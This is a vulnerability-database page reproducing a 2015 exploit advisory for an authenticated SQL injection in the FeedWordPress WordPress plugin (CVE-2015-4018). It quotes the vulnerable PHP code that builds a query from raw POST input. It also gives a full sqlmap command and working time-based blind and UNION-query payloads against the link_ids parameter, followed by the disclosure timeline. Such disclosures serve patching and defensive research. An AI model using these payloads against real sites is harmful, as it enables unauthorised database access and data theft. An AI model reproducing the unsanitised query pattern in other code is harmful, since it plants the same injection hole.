Vulners
Lucene search
WordPress Plugin FeedWordPress 2015.0426 - SQL Injection
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | WordPress FeedWordPress Plugin - SQL Injection Vulnerability | 20 May 201500:00 | – | zdt |
 | CVE-2015-4018 | 20 May 201500:00 | – | circl |
 | Unspecified SQL Injection Vulnerability in WordPress Plugin FeedWordPress | 19 May 201500:00 | – | cnvd |
 | CVE-2015-4018 | 21 May 201520:00 | – | cve |
 | CVE-2015-4018 | 21 May 201520:00 | – | cvelist |
 | EUVD-2015-4047 | 7 Oct 202500:30 | – | euvd |
 | WordPress Plugin FeedWordPress 2015.0426 - SQL Injection | 20 May 201500:00 | – | exploitpack |
 | CVE-2015-4018 | 21 May 201520:59 | – | nvd |
 | WordPress FeedWordPress 2015.0426 SQL Injection | 19 May 201500:00 | – | packetstorm |
| Wing FTP 4.4.6 Cross Site Request Forgery | 5 Jun 201500:00 | – | packetstorm |
10
# Exploit Title: SQLi in FeedWordPress WordPress plugin
# Date: 2015-05-19
# Exploit Author: Adrián M. F.
# Vendor Homepage: https://wordpress.org/plugins/feedwordpress/
# Vulnerable version: 2015.0426
# Fixed version: 2015.0514
# CVE : CVE-2015-4018
(1) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
feedwordpresssyndicationpage.class.php:89
+++++++++++++++++++++++++++++++++++++++++
$targets = $wpdb->get_results("
SELECT * FROM $wpdb->links
WHERE link_id IN (".implode(",",$_POST['link_ids']).")
");
+++++++++++++++++++++++++++++++++++++++++
http://192.168.167.131/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php
POST DATA: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1[SQLi]
* POC:
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py -u "http://[domain]/wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=Y" --data="_wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1" -p "link_ids[]" --dbms mysql --cookie="[cookie]"
[............]
POST parameter 'link_ids[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: link_ids[] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) AND (SELECT * FROM (SELECT(SLEEP(5)))eHWc) AND (7794=7794
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x70716153577975544373,0x7178716271)--
---
[10:40:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-14: Vendor notification.
2015-05-14: Vendor response and fix.
2015-05-19: Public disclosure.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 May 2015 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 26.5
EPSS0.0251